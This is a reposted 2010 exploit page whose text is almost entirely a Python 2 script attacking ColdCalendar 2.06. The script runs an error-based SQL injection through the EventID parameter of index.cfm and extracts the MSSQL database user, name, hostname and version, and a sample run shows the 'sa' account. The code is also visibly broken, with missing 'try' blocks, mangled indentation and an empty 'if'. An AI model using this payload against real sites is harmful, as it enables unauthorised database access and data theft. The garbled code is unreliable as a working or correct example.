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ColdCalendar 2.06 SQL Injection Exploit
来源:ninja.net 作者:mr_me 发布时间:2010-09-08  

# ColdGen - coldcalender v2.06 Remote 0day SQL Injection Exploit
# Vendor: http://www.coldgen.com/
# Found by: mr_me
# ----------------------------------------------->
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# ----------------------------------------------->
# The vulnerability:
# ===================
# - SQL Injection in the index.cfm using parameters: EventID
# This tool assumes the target has a MSSQL backend.
# ./ColdCal0day.py -p localhost:8080 -t localhost:8500 -d /coldcal/
#  | ----------------------------------------------------------- |
#  |  -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |
#  | --------------[ by mr_me - net-ninja.net ]----------------- |
# (+) Exploiting target @: http://localhost:8500/coldcal/
# (+) Testing Proxy...
# (+) Proxy @ localhost:8080
# (+) Building Handler..
# (!) Found database version:
#  Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86)
#  Aug  19 2006 20:47:07
#  Copyright (c) 1988-2005 Microsoft Corporation
#  Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
# (!) Found database hostname:
# (!) Found database user: sa
# (!) Found database name: coldcal

import sys, httplib, urllib2, urllib, re
from optparse import OptionParser

usage = "./%prog [<options>] -t [target] -d [directory]"
usage += "\nExample: ./%prog -p localhost:8080 -t localhost:8500 -d /coldcal/"

parser = OptionParser(usage=usage)
parser.add_option("-p", type="string",action="store", dest="proxy",
                  help="HTTP Proxy <server:port>")
parser.add_option("-t", type="string", action="store", dest="target",
                  help="The Target server <server:port>")
parser.add_option("-d", type="string", action="store", dest="directory",
                  help="Directory path to the CMS")
(options, args) = parser.parse_args()

def banner():
    print "\n\t| ----------------------------------------------------------- |"
    print "\t|  -= ColdCalender v2.06 Remote 0day SQL Injection Exploit =- |"
    print "\t| --------------[ by mr_me - net-ninja.net ]----------------- |\n"

if len(sys.argv) < 5:

def getProxy():
  pr = httplib.HTTPConnection(options.proxy)
  proxy_handler = urllib2.ProxyHandler({'http': options.proxy})
  print "\n(-) Proxy Timed Out"
  print "\n(-) Proxy Failed"
 return proxy_handler

def setTargetHTTP():
 if options.target[0:7] != 'http://':
  options.target = "http://" + options.target
 return options.target
def getRequest(exploit):
 if options.proxy:
   proxyfier = urllib2.build_opener(getProxy())
   check = proxyfier.open(options.target+options.directory+exploit).read()
  except urllib2.HTTPError, error:
   check = error.read()
  except socket.error:
   print "(-) Proxy connection failed"
   req = urllib2.Request(options.target+options.directory+exploit)
   check = urllib2.urlopen(req).read()
  except urllib2.HTTPError, error:
   check = error.read()
  except urllib2.URLError:
   print "(-) Target connection failed, check your address"
 return check

basicInfo = {'user: ':'user_name()', 'name: ':'db_name()', 'hostname: ':'host_name()','version: \n\n\t':'@@version'}

def basicSploit(info):
 return "index.cfm?fuseaction=ViewEventDetails&EventID=1+and+1=convert(int," + info + ")--"

if __name__ == "__main__":
 options.target = setTargetHTTP()
 print "(+) Exploiting target @: %s" % (options.target+options.directory)
 if options.proxy:
  print "\n(+) Testing Proxy..."
  print "(+) Proxy @ %s" % (options.proxy)
  print "(+) Building Handler.."

 for key in basicInfo:
  getResp = getRequest(basicSploit(basicInfo[key]))
  if re.findall("the nvarchar value '", getResp):
   dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0]
   print "\n(!) Found database %s%s" % (key, dbInfo.rstrip())  

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